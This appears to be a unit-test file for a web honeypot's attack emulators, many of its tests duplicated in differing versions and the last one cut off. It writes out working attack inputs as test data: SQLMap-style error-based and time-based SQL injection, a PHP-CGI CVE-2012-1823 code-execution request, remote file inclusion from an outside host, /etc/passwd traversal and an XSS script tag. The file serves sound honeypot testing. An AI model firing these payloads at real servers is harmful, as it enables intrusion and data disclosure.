def test_unknown_emulator(self):
    """Objective: Emulator testing for non-malicious requests.
    Input: http://localhost:8080/
    Expected Result: One of the generated attack surfaces.
    Notes: Seeds dork_pages with one throwaway page before the emulator runs."""
    dork_dir = os.path.join(self.data_dir, 'dork_pages')
    os.mkdir(dork_dir)
    seed_page = os.path.join(dork_dir, str(uuid.uuid4()))
    with open(seed_page, 'w+') as fh:
        fh.write("tmpfile")
    print "Starting 'unknown' request emulation module"
    parsed = util.HTTPRequest()
    parsed.url = "/"
    self.event.parsed_request = parsed
    self.event.matched_pattern = "unknown"
    self.event.response = ""
    self.event.source_addr = ("127.0.0.1", "8080")
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    print "Sending request:", "http://localhost:8080/"
    module.handle(self.event)
    # md5 is used only as a content-equality fingerprint between the served
    # body and the emulator's template, not as a security control.
    served_digest = hashlib.md5(self.event.response).hexdigest()
    template_digest = hashlib.md5(module.template).hexdigest()
    print "Hash of the local 'response' file:", template_digest
    self.assertEqual(served_digest, template_digest)
    print "Return value:", served_digest
    print "matched a generated attack surface item."
def test_unknown_emulator(self):
    """Objective: Emulator testing for non-malicious requests.
    Input: http://localhost:8080/
    Expected Result: One of the generated attack surfaces.
    Notes: Writes one throwaway page into the existing dork_pages directory."""
    seed_page = os.path.join(self.data_dir, 'dork_pages', str(uuid.uuid4()))
    with open(seed_page, 'w+') as fh:
        fh.write("tmpfile")
    print "Starting 'unknown' request emulation module"
    event = attack.AttackEvent()
    event.http_request = HTTPHandler('', None)
    event.http_request.path = "/"
    event.matched_pattern = "unknown"
    event.source_ip = "127.0.0.1"
    event.source_port = "8080"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(event.matched_pattern)
    print "Sending request:", "http://localhost:8080/"
    module.handle(event)
    # md5 is used only as a content-equality fingerprint here, not as a
    # security control.
    served_digest = hashlib.md5(event.http_request.get_response_body()).hexdigest()
    template_digest = hashlib.md5(module.template).hexdigest()
    print "Hash of the local 'response' file:", template_digest
    self.assertEqual(served_digest, template_digest)
    print "Return value:", served_digest
    print "matched a generated attack surface item."
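def test_sqli_xss(self):
    """Objective: Injecting JavaScript.
    Input: '<script>alert("XSS");</script>'
    Expected Results: MySQL syntax error message containing '<script>alert("XSS");</script>'
    Notes: The query and identifying string is included in the error message."""
    payload = '<script>alert("XSS");</script>'
    self.event.matched_pattern = "sqli"
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(self.event.matched_pattern)
    self.event.http_request.request_query = {"q": [payload]}
    self._get_test_request(self.event)
    emulator.handle(self.event)
    # assertIn prints both operands on failure; assertTrue(x in y) only says "False".
    self.assertIn(payload, self.event.http_request.get_response())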
def test_sqli_lexer(self):
    """Objective: Tests the SQL injection lexer.
    Input: 'SELECT A FROM B' (presumably supplied by _get_test_request).
    Expected Results: The emulator's "fingerprint" result equals "Enkn".
    Notes: """
    self.event.matched_pattern = "sqli"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    self._get_test_request(self.event)
    module.handle(self.event)
    self.assertEqual("Enkn", module.ret["fingerprint"])
def test_sqli_emulator(self):
    """Objective: Assure that the SQL injection module is integrated.
    Input: Inject 'SELECT a FROM b' in parameter q.
    Expected Results: MySQL error message.
    Notes: As there is no table b, the honeypot returns an error message."""
    expected = (
        "Invalid query: You have an error in your SQL syntax; check the manual "
        "that corresponds to your MySQL server version for the right syntax to "
        "use near 'SELECT A FROM B' at line 1"
    )
    self.event.matched_pattern = "sqli"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    self._get_test_request(self.event)
    module.handle(self.event)
    self.assertEqual(self.event.http_request.get_response(), expected)
def test_sqli_select_user(self):
    """Objective: A query with the goal to disclosure the current user.
    Input: SELECT user().
    Expected Results: Current SQL user name.
    Notes: This query is MySQL specific."""
    self.event.matched_pattern = "sqli"
    self.event.http_request.request_query = {"q": ["SELECT user()"]}
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    self._get_test_request(self.event)
    module.handle(self.event)
    # Surrounding whitespace in the emulated reply is not part of the contract.
    body = self.event.http_request.get_response().strip()
    self.assertEqual(body, "root@localhost")
def test_sqli_mysqld_version(self):
    """Objective: A query with the goal to disclose the MySQL server version.
    Input: SELECT @@version.
    Expected Results: The MySQL server version number.
    Notes: The query is MySQL specific."""
    self.event.matched_pattern = "sqli"
    self.event.http_request.request_query = {"q": ["SELECT @@version"]}
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    self._get_test_request(self.event)
    module.handle(self.event)
    # Surrounding whitespace in the emulated reply is not part of the contract.
    body = self.event.http_request.get_response().strip()
    self.assertEqual(body, "5.1.49-3")
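def test_phpinfo_emulator(self):
    """Objective: Emulator testing for phpinfo.php requests
    Input: http://localhost/phpinfo.php
    Expected Result: Result of the phpinfo() function
    Notes: Checks two markers of a phpinfo() page rather than the whole body."""
    self.event.parsed_request = util.HTTPRequest()
    self.event.parsed_request.method = 'GET'
    self.event.parsed_request.url = "/info.php?param1"
    self.event.matched_pattern = "phpinfo"
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(self.event.matched_pattern)
    emulator.handle(self.event)
    # assertIn shows the actual body on failure; assertTrue(x in y) does not.
    self.assertIn("PHP Version ", self.event.response)
    self.assertIn("Zend Extension", self.event.response)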
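def test_phpcgi_source_code_disclosure_emulator(self):
    """Objective: Emulator testing for PHP CGI source code disclosure CVE-2012-1823
    Input: http://localhost:8080/index.php?-s
    Expected Result: Source code disclosure
    Notes: The expected body is the syntax-highlighted source the emulator serves."""
    event = attack.AttackEvent()
    event.http_request = HTTPHandler('GET /index.php?-s HTTP/1.0', None)
    event.matched_pattern = "php_cgi_rce"
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(event.matched_pattern)
    emulator.handle(event)
    expected = """<code><span style="color: #000000"> <span style="color: #0000BB"><?php<br />page </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'page'</span><span style="color: #007700">];<br />include(</span><span style="color: #0000BB">page</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">?><br /></span> </span>"""
    # assertEquals is a deprecated alias of assertEqual.
    self.assertEqual(event.http_request.get_response(), expected)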
def test_dummy_emulator(self):
    """Objective: Tests the dummy emulator added to prove extensibility.
    Input: http://localhost:8080/
    Expected Results: Returns a short message for verification.
    Notes: The dummy emulator fulfills minimal emulator requirements."""
    print "Starting Dummy emulator module test"
    self.event.matched_pattern = "dummy"
    print "Loading module"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    print "Trying to handle an event with the dummy module"
    module.handle(self.event)
    self.assertEqual("dummy response", self.event.response)
    print "Return value: '" + self.event.response + "'",
    print "equates our expectation."
def test_sqli_error_based(self):
    """Objective: A simple query provoking an error message from the database.
    Input: Inject a single quotation mark in parameter q.
    Expected Results: MySQL syntax error message.
    Notes: The query is included in the error message."""
    expected = (
        "Invalid query: You have an error in your SQL syntax; check the manual "
        "that corresponds to your MySQL server version for the right syntax to "
        "use near ''' at line 1"
    )
    self.event.matched_pattern = "sqli"
    self.event.http_request.request_query = {"q": ["'"]}
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    self._get_test_request(self.event)
    module.handle(self.event)
    self.assertEqual(self.event.http_request.get_response(), expected)
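def test_phpinfo_emulator(self):
    """Objective: Emulator testing for phpinfo.php requests
    Input: http://localhost/phpinfo.php
    Expected Result: Result of the phpinfo() function
    Notes: Checks two markers of a phpinfo() page rather than the whole body."""
    event = attack.AttackEvent()
    event.http_request = HTTPHandler('GET /info.php?param1 HTTP/1.0', None)
    # Set once; the original assigned the same pattern twice around dead code.
    event.matched_pattern = "phpinfo"
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(event.matched_pattern)
    emulator.handle(event)
    # assertIn shows the actual body on failure; assertTrue(x in y) does not.
    self.assertIn("PHP Version ", event.http_request.get_response())
    self.assertIn("Zend Extension", event.http_request.get_response())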
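def test_phpcgi_source_code_disclosure_emulator(self):
    """Objective: Emulator testing for PHP CGI source code disclosure CVE-2012-1823
    Input: http://localhost:8080/index.php?-s
    Expected Result: Source code disclosure
    Notes: The expected body is the syntax-highlighted source the emulator serves."""
    self.event.parsed_request = util.HTTPRequest()
    self.event.parsed_request.url = "/index.php"
    self.event.parsed_request.parameters = "-s"
    self.event.matched_pattern = "php_cgi_rce"
    self.event.response = ""
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(self.event.matched_pattern)
    emulator.handle(self.event)
    expected = """<code><span style="color: #000000"> <span style="color: #0000BB"><?php<br />page </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'page'</span><span style="color: #007700">];<br />include(</span><span style="color: #0000BB">page</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">?><br /></span> </span>"""
    # assertEquals is a deprecated alias of assertEqual.
    self.assertEqual(self.event.response, expected)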
def test_sqli_emulator(self):
    """Objective: Assure that the SQL injection module is integrated.
    Input: Inject 'SELECT a FROM b' in parameter q.
    Expected Results: MySQL error message.
    Notes: As there is no table b, the honeypot returns an error message."""
    expected = (
        "Invalid query: You have an error in your SQL syntax; check the manual "
        "that corresponds to your MySQL server version for the right syntax to "
        "use near 'SELECT A FROM B' at line 1"
    )
    print "Starting SQL injection module integration test..."
    self.event.matched_pattern = "sqli"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    self._get_test_request(self.event)
    print "Sending request:", self.test_request
    module.handle(self.event)
    self.assertEqual(self.event.response, expected)
    print "Return value: Invalid query: You have an error in your SQL syntax; (truncated)",
    print "equates our expectation."
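def test_phpcgi_rce_emulator(self):
    """Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823
    Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input
           POST: <?php echo("rce attempt"); ?>
    Expected Result: Remote command execution of a echo command
    Notes: prepare_sandbox runs first; presumably the emulator evaluates the
           POSTed PHP inside that sandbox rather than on the host."""
    GlastopfHoneypot.prepare_sandbox(self.work_dir)
    os.mkdir(os.path.join(self.data_dir, 'files/'))
    request = (
        "POST /index.php?-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off"
        "-d+auto_prepend_file=php://input HTTP/1.0\r\n\r\n"
        '<?php echo "testing"; ?>'
    )
    event = attack.AttackEvent()
    event.http_request = HTTPHandler(request, None)
    event.matched_pattern = "php_cgi_rce"
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(event.matched_pattern)
    emulator.handle(event)
    print "Return value:", event.http_request.get_response()
    # assertEqual reports both values on failure; assertTrue(a == b) only "False".
    self.assertEqual("testing", event.http_request.get_response())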
def test_sqli_parser(self):
    """Objective: Tests the SQL injection parser.
    Input: 'SELECT A FROM B'
    Expected Results: Parsed tokens (SELECT (SELECT_CORE (COLUMNS (ALIAS (COLUMN_EXPRESSION A))) (FROM (ALIAS B))))
    Notes: The Parser turns the tokens into a query"""
    expected_tree = '(SELECT (SELECT_CORE (COLUMNS (ALIAS (COLUMN_EXPRESSION A))) (FROM (ALIAS B))))'
    print "Starting SQL injection Parser test..."
    self.event.matched_pattern = "sqli"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    self._get_test_request(self.event)
    print "Sending request:", self.test_request
    module.handle(self.event)
    self.assertEqual(module.query_parser.tree, expected_tree)
    print "Return value: Parsed tokens:",
    print expected_tree,
    print "equates our expectation."
def test_rfi_emulator_with_malformed_uri(self):
    """Objective: Remote File Injection test with malformed uri
    Input: http://localhost:8080/test.php?p=http://1durch0.de/test_file.txt
    Expected Result: The return value from the PHP sandbox.
    Notes: Injected file contains <?php echo("test successful"); ?>
           The included file lives on a remote host, so this test presumably
           needs network access."""
    # TODO: Handle return value from sandbox
    GlastopfHoneypot.prepare_sandbox(self.work_dir)
    print "Starting remote file inclusion test"
    request_line = 'GET /test.php?p=http://1durch0.de/test_file.txt HTTP/1.0'
    event = attack.AttackEvent()
    event.http_request = HTTPHandler(request_line, None)
    event.matched_pattern = "rfi"
    helpers.create_sandbox(self.data_dir)
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(event.matched_pattern)
    print "Sending request:", "http://localhost:8080" + event.http_request.path
    module.handle(event)
    self.assertEqual("test successful", event.http_request.get_response())
    print "Return value 'test successful', matching our expectation."
def test_sqli_lexer(self):
    """Objective: Tests the SQL injection lexer.
    Input: 'SELECT A FROM B'
    Expected Results: Query tokens 121, 237, 80, 237, 122, 237, 80
    Notes: 121 matches the SELECT, 237 the three white spaces, 80 the column and table alias and 122 the FROM"""
    expected_tokens = [121, 237, 80, 237, 122, 237, 80]
    print "Starting SQL injection Lexer test..."
    self.event.matched_pattern = "sqli"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    self._get_test_request(self.event)
    print "Sending request:", self.test_request
    module.handle(self.event)
    tokens = module.query_parser.tokens
    self.assertEqual(tokens, expected_tokens)
    print "Return value: Query tokens:",
    print "'" + ', '.join(map(str, tokens)) + "'",
    print "equates our expectation."
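def test_phpcgi_rce_emulator(self):
    """Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823
    Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input
           POST: <?php echo("rce attempt"); ?>
    Expected Result: Remote command execution of a echo command
    Notes: prepare_sandbox runs first; presumably the emulator evaluates the
           POSTed PHP inside that sandbox rather than on the host."""
    GlastopfHoneypot.prepare_sandbox(self.work_dir)
    os.mkdir(os.path.join(self.data_dir, 'files/'))
    self.event.parsed_request = util.HTTPRequest()
    self.event.parsed_request.method = 'POST'
    self.event.parsed_request.url = "/index.php"
    self.event.parsed_request.parameters = "-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input"
    self.event.matched_pattern = "php_cgi_rce"
    self.event.parsed_request.body = '<?php echo "testing"; ?>'
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(self.event.matched_pattern)
    emulator.handle(self.event)
    print "Return value:", self.event.response
    # assertEqual reports both values on failure; assertTrue(a == b) only "False".
    self.assertEqual("testing", self.event.response)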
def test_rfi_emulator(self):
    """Objective: Remote File Injection test.
    Input: http://localhost:8080/test.php?p=http://1durch0.de/test_file.txt
    Expected Result: The return value from the PHP sandbox.
    Notes: Injected file contains <?php echo("test successful"); ?>
           The included file lives on a remote host, so this test presumably
           needs network access."""
    # TODO: Handle return value from sandbox
    GlastopfHoneypot.prepare_sandbox(self.work_dir)
    print "Starting remote file inclusion test"
    parsed = util.HTTPRequest()
    parsed.url = "/test.php?p=http://1durch0.de/test_file.txt"
    self.event.parsed_request = parsed
    print "Sending request:", "http://localhost:8080" + parsed.url
    self.event.matched_pattern = "rfi"
    self.event.response = ""
    helpers.create_sandbox(self.data_dir)
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    module.handle(self.event)
    self.assertEqual("test successful", self.event.response)
    print "Return value 'test successful', matching our expectation."
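def test_sqli_xss(self):
    """Objective: Injecting JavaScript.
    Input: '<script>alert("XSS");</script>'
    Expected Results: MySQL syntax error message containing '<script>alert("XSS");</script>'
    Notes: The query and identifying string is included in the error message."""
    payload = '<script>alert("XSS");</script>'
    print "Starting error based JavaScript injection test"
    self.event.matched_pattern = "sqli"
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(self.event.matched_pattern)
    self.event.http_request.request_query = {
        'q': [payload],
    }
    self._get_test_request(self.event)
    print "Sending request:", self.test_request
    emulator.handle(self.event)
    # assertIn prints both operands on failure; assertTrue(x in y) only says "False".
    self.assertIn(payload, self.event.http_request.get_response())
    print "Return value: ", self.event.http_request.get_response(),
    print "equates our expectation."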
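def test_error_based_concatenated(self):
    """Objective: Complex error based vulnerability probing request containing CONCAT.
    Input: ') AND (SELECT 8957 FROM(SELECT COUNT(*),CONCAT(0x3a6e676a3a,(SELECT (CASE WHEN (8957=8957) THEN 1 ELSE 0 END)),0x3a6f74633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4673=4673'
    Expected Results: MySQL syntax error message containing ':ngj:1:otc:0' (the result from the CONCAT call)
    Notes: The query and identifying string is included in the error message."""
    print "Starting error based SQLMap injection test"
    self.event.matched_pattern = "sqli"
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(self.event.matched_pattern)
    self.event.http_request.request_query = {
        "q": [") AND (SELECT 8957 FROM(SELECT COUNT(*),CONCAT(0x3a6e676a3a,(SELECT (CASE WHEN (8957=8957) THEN 1 ELSE 0 END)),0x3a6f74633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4673=4673"],
    }
    self._get_test_request(self.event)
    print "Sending request:", self.test_request
    emulator.handle(self.event)
    # assertIn prints both operands on failure; assertTrue(x in y) only says "False".
    self.assertIn(':ngj:1:otc:0', self.event.http_request.get_response())
    print "Return value: ", self.event.http_request.get_response(),
    print "equates our expectation."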
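def test_put_method(self):
    """Objective: Test handling of a PUT requests
    Input: curl -XPUT http://localhost/
    Expected Result: request verb is PUT, matcher pattern is put
    Notes: The verb dispatcher falls back to the GET handler for verbs it has no
           attribute for."""
    event = attack.AttackEvent()
    event.http_request = HTTPHandler('PUT / HTTP/1.0', None)
    # assertEqual reports both values on failure; assertTrue(a == b) only "False".
    self.assertEqual("PUT", event.http_request.request_verb)
    method_handlers = method_handler.HTTPMethods(self.data_dir)
    # Look up the handler by verb name; getattr's default makes GET the fallback.
    event.matched_pattern = getattr(
        method_handlers, event.http_request.command, method_handlers.GET
    )(event.http_request)
    self.assertEqual('put', event.matched_pattern)
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(event.matched_pattern)
    emulator.handle(event)
    self.assertIn('Created', event.http_request.get_response())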
def test_rfi_emulator_with_malformed_uri(self):
    """Objective: Remote File Injection test with malformed uri
    Input: http://localhost:8080/test.php?p=<raw gist URL of test_file.txt>
    Expected Result: The return value from the PHP sandbox.
    Notes: Injected file contains <?php echo("test successful"); ?>
           The included file is fetched from a remote host, so this test
           presumably needs network access."""
    # TODO: Handle return value from sandbox
    GlastopfHoneypot.prepare_sandbox(self.work_dir)
    print "Starting remote file inclusion test"
    included = "https://gist.githubusercontent.com/glaslos/02c4c4be39fb03b3bbee5c862cd304c6/raw/adf146469e8eeee4498874164ecd80c70ffb4e7a/test_file.txt"
    request_line = 'GET /test.php?p={} HTTP/1.0'.format(included)
    event = attack.AttackEvent()
    event.http_request = HTTPHandler(request_line, None)
    event.matched_pattern = "rfi"
    helpers.create_sandbox(self.data_dir)
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(event.matched_pattern)
    print "Sending request:", "http://localhost:8080" + event.http_request.path
    module.handle(event)
    self.assertEqual("test successful", event.http_request.get_response())
    print "Return value 'test successful', matching our expectation."
def test_pma_emulator(self):
    """Objective: Testing an emulator for PHPMyAdmin specific attacks.
    Input: http://localhost:8080/phpmyadmin
    Expected Result: The PHPMyAdmin set-up page.
    Notes: This module is for a specific attack against PHPMyAdmin"""
    setup_path = os.path.join(self.data_dir, 'phpmyadmin/script_setup.php')
    with open(setup_path, 'r') as fh:
        setup_source = fh.read()
    # md5 is used only as a content-equality fingerprint here, not as a
    # security control.
    expected_digest = hashlib.md5(setup_source).hexdigest()
    print "Hash of the local 'script' file:", expected_digest
    self.event.matched_pattern = "phpmyadmin"
    self.event.response = ""
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    print "Sending request:", "http://localhost:8080/phpmyadmin/setup.php"
    module.handle(self.event)
    served_digest = hashlib.md5(module.page).hexdigest()
    self.assertEqual(served_digest, expected_digest)
    print "Return value:", served_digest
    print "matched the hash of the local file."
def test_style_css_emulator(self):
    """Objective: Test the style.css emulator.
    Input: http://localhost:8080/styles.css
    Expected Result: The styles.css file.
    Notes: Definitions used for the attacks surface style parameters."""
    print "Starting style.css emulator test"
    css_path = os.path.join(self.data_dir, 'style/style.css')
    with open(css_path, 'r') as fh:
        css_source = fh.read()
    # md5 is used only as a content-equality fingerprint here, not as a
    # security control.
    expected_digest = hashlib.md5(css_source).hexdigest()
    print "Hash of the local 'style' file:", expected_digest
    self.event.matched_pattern = "style_css"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    print "Sending request:", "http://localhost:8080/style.css"
    module.handle(self.event)
    served_digest = hashlib.md5(self.event.response).hexdigest()
    self.assertEqual(served_digest, expected_digest)
    print "Return value:", served_digest
    print "matched content of style.css."
def test_robots_emulator(self):
    """Objective: Test the robots.txt emulator.
    Input: http://localhost:8080/robots.txt
    Expected Response: The robots.txt page.
    Notes: The robots.txt is provided by the honeypot"""
    print "Starting robot.txt request handling module"
    robots_path = os.path.join(self.data_dir, 'robots/robots.txt')
    with open(robots_path, 'r') as fh:
        robots_source = fh.read()
    # md5 is used only as a content-equality fingerprint here, not as a
    # security control.
    expected_digest = hashlib.md5(robots_source).hexdigest()
    print "Hash of the local 'robots' file:", expected_digest
    self.event.matched_pattern = "robots"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    print "Sending request:", "http://localhost:8080/robots.txt"
    module.handle(self.event)
    served_digest = hashlib.md5(self.event.response).hexdigest()
    self.assertEqual(served_digest, expected_digest)
    print "Return value:", served_digest
    print "matched content of robots.txt."
def test_lfi_emulator(self):
    """Objective: Local File Inclusion module testing.
    Input: http://localhost:8080/test.php?p=../../../../../etc/passwd
    Expected Result: The passwd file from the virtual file system.
    Notes: Only two well-known account lines are checked, not the whole file."""
    print "Starting local file inclusion test"
    target = "/test.php?p=../../../../../etc/passwd"
    event = attack.AttackEvent()
    event.matched_pattern = "lfi"
    event.http_request = HTTPHandler('', None)
    event.http_request.request_url = target
    print "Sending request:", "http://localhost:8080" + target
    print "Loading the emulator and handling the request."
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(event.matched_pattern)
    module.handle(event)
    # TODO: Check it contains user names...
    body = event.http_request.get_response()
    for account_line in (
        'root:x:0:0:root:/root:/bin/bash',
        'daemon:x:1:1:daemon:/usr/sbin:/bin/sh',
    ):
        self.assertIn(account_line, body)
def test_sqli_mysqld_version(self):
    """Objective: A query with the goal to disclose the MySQL server version.
    Input: SELECT @@version.
    Expected Results: The MySQL server version number.
    Notes: The query is MySQL specific."""
    expected = "5.1.49-3"
    print "Starting mysqld version disclosure test"
    self.event.matched_pattern = "sqli"
    self.event.http_request.request_query = {"q": ["SELECT @@version"]}
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    self._get_test_request(self.event)
    print "Sending request:", self.test_request
    module.handle(self.event)
    # Surrounding whitespace in the emulated reply is not part of the contract.
    body = self.event.http_request.get_response().strip()
    self.assertEqual(body, expected)
    print "Return value: ", expected,
    print "equates our expectation."
def test_sqli_select_user(self):
    """Objective: A query with the goal to disclosure the current user.
    Input: SELECT user().
    Expected Results: Current SQL user name.
    Notes: This query is MySQL specific."""
    expected = "root@localhost"
    print "Starting SQL user disclosure test"
    self.event.matched_pattern = "sqli"
    self.event.http_request.request_query = {"q": ["SELECT user()"]}
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    self._get_test_request(self.event)
    print "Sending request:", self.test_request
    module.handle(self.event)
    # Surrounding whitespace in the emulated reply is not part of the contract.
    body = self.event.http_request.get_response().strip()
    self.assertEqual(body, expected)
    print "Return value: ", expected,
    print "equates our expectation."
def test_robots_emulator(self):
    """Objective: Test the robots.txt emulator.
    Input: http://localhost:8080/robots.txt
    Expected Response: The robots.txt page.
    Notes: The robots.txt is provided by the honeypot"""
    print "Starting robot.txt request handling module"
    robots_path = os.path.join(self.data_dir, 'robots/robots.txt')
    with open(robots_path, 'r') as fh:
        robots_source = fh.read()
    # md5 is used only as a content-equality fingerprint here, not as a
    # security control.
    expected_digest = hashlib.md5(robots_source).hexdigest()
    print "Hash of the local 'robots' file:", expected_digest
    event = attack.AttackEvent()
    event.http_request = HTTPHandler('GET /robots.txt HTTP/1.0', None)
    event.matched_pattern = "robots"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(event.matched_pattern)
    print "Sending request:", "http://localhost:8080/robots.txt"
    module.handle(event)
    served_digest = hashlib.md5(event.http_request.get_response()).hexdigest()
    self.assertEqual(served_digest, expected_digest)
    print "Return value:", served_digest
    print "matched content of robots.txt."
def test_style_css_emulator(self):
    """Objective: Test the style.css emulator.
    Input: http://localhost:8080/styles.css
    Expected Result: The styles.css file.
    Notes: Definitions used for the attacks surface style parameters."""
    print "Starting style.css emulator test"
    css_path = os.path.join(self.data_dir, 'style/style.css')
    with open(css_path, 'r') as fh:
        css_source = fh.read()
    # md5 is used only as a content-equality fingerprint here, not as a
    # security control.
    expected_digest = hashlib.md5(css_source).hexdigest()
    print "Hash of the local 'style' file:", expected_digest
    event = attack.AttackEvent()
    event.http_request = HTTPHandler('', None)
    event.matched_pattern = "style_css"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(event.matched_pattern)
    print "Sending request:", "http://localhost:8080/style.css"
    module.handle(event)
    served_digest = hashlib.md5(event.http_request.get_response_body()).hexdigest()
    self.assertEqual(served_digest, expected_digest)
    print "Return value:", served_digest
    print "matched content of style.css."
def test_pma_emulator(self):
    """Objective: Testing an emulator for PHPMyAdmin specific attacks.
    Input: http://localhost:8080/phpmyadmin
    Expected Result: The PHPMyAdmin set-up page.
    Notes: This module is for a specific attack against PHPMyAdmin"""
    setup_path = os.path.join(self.data_dir, 'phpmyadmin/script_setup.php')
    with open(setup_path, 'r') as fh:
        setup_source = fh.read()
    # md5 is used only as a content-equality fingerprint here, not as a
    # security control.
    expected_digest = hashlib.md5(setup_source).hexdigest()
    print "Hash of the local 'script' file:", expected_digest
    event = attack.AttackEvent()
    event.matched_pattern = "phpmyadmin"
    event.http_request = HTTPHandler('', None)
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(event.matched_pattern)
    print "Sending request:", "http://localhost:8080/phpmyadmin/setup.php"
    module.handle(event)
    served_digest = hashlib.md5(module.page).hexdigest()
    self.assertEqual(served_digest, expected_digest)
    print "Return value:", served_digest
    print "matched the hash of the local file."
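def test_error_based_concatenated(self):
    """Objective: Complex error based vulnerability probing request containing CONCAT.
    Input: ') AND (SELECT 8957 FROM(SELECT COUNT(*),CONCAT(0x3a6e676a3a,(SELECT (CASE WHEN (8957=8957) THEN 1 ELSE 0 END)),0x3a6f74633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4673=4673'
    Expected Results: MySQL syntax error message containing ':ngj:1:otc:0' (the result from the CONCAT call)
    Notes: The query and identifying string is included in the error message."""
    print "Starting error based SQLMap injection test"
    self.event.matched_pattern = "sqli"
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(self.event.matched_pattern)
    self.event.http_request.request_query = {
        "q": [
            ") AND (SELECT 8957 FROM(SELECT COUNT(*),CONCAT(0x3a6e676a3a,(SELECT (CASE WHEN (8957=8957) THEN 1 ELSE 0 END)),0x3a6f74633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4673=4673"
        ],
    }
    self._get_test_request(self.event)
    print "Sending request:", self.test_request
    emulator.handle(self.event)
    # assertIn prints both operands on failure; assertTrue(x in y) only says "False".
    self.assertIn(':ngj:1:otc:0', self.event.http_request.get_response())
    print "Return value: ", self.event.http_request.get_response(),
    print "equates our expectation."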
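def test_obfuscated_blind_sqli(self):
    """Objective: Injecting an obfuscated response delaying SQL query.
    Input: ')%20aND%20SLeeP(1)%20And%20(4673%3D4673'
    Expected Results: Response is delayed by 1 second
    Notes: Timing uses datetime.now() (wall clock), so a clock adjustment during
           the call could skew the measured duration."""
    print "Starting obfuscated time based injection test"
    self.event.matched_pattern = "sqli"
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(self.event.matched_pattern)
    self.event.parsed_request.parameters_dict = {
        "q": ")%20aND%20SLeeP(1)%20And%20(4673%3D4673",
    }
    self._get_test_request(self.event)
    print "Noting time and sending request:", self.test_request
    start = datetime.datetime.now()
    emulator.handle(self.event)
    end = datetime.datetime.now()
    duration = end - start
    # timedelta.seconds is only the seconds *component*; total_seconds() is the
    # full span, which is what the delay assertion is about.
    self.assertGreaterEqual(duration.total_seconds(), 1)
    print "Response duration: ", duration,
    print "equates our expectation."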
def test_favicon_emulator(self):
    """Objective: Test the favicon.ico handling module.
    Input: http://localhost:8080/favicon.ico
    Expected Result: Returns a favicon for the browser if available.
    Notes: Providing a unique favicon could improve the deception."""
    # TODO: Handle existing favicon
    print "Starting favicon module test"
    self.event.matched_pattern = "favicon_ico"
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    print "Sending request to the module: http://localhost:8080/favicon.ico"
    self.event.parsed_request.url = "/favicon.ico"
    module.handle(self.event)
    favicon_path = os.path.join(self.original_data_dir, 'favicon/favicon.ico')
    with open(favicon_path, 'r') as fh:
        favicon_bytes = fh.read()
    # md5 is used only as a content-equality fingerprint here, not as a
    # security control.
    expected_digest = hashlib.md5(favicon_bytes).hexdigest()
    print "Calculate md5 hash from local favicon file:", expected_digest
    # The response carries HTTP headers; the body is what follows the blank line.
